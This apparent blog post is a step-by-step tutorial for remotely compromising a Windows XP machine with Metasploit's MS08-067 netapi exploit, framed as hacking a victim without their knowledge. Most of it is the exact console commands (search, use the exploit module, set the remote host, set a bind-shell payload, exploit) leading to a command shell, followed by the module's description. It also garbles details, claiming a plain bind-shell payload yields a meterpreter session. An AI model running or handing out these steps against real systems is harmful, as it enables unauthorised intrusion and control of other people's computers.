Its very simple to hack a remote system without the victim knowledge .
Requirement
Attacker System : Backtrack
Victim System : window xp
Steps follows :
open terminal and type msfconsole
Step 1 : search for Exploit
msf > search netapi
msf > use exploit/windows/smb/ms08_067_netapi
step 2 : set the perimeters which requires yes
msf > Set Remote host
msf > set rhost 192.168.56.101
Step 3 : Set payloads
> set payload windows/shell_bind_tcp
Step 4 : exploit the system using command
>exploit
exploit success and we get the meterpreter session now type shell now we get the command shell of the remote system
--------------------------------------------------------------------------------------------
Netapi from metasploit : This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.
No comments:
Post a Comment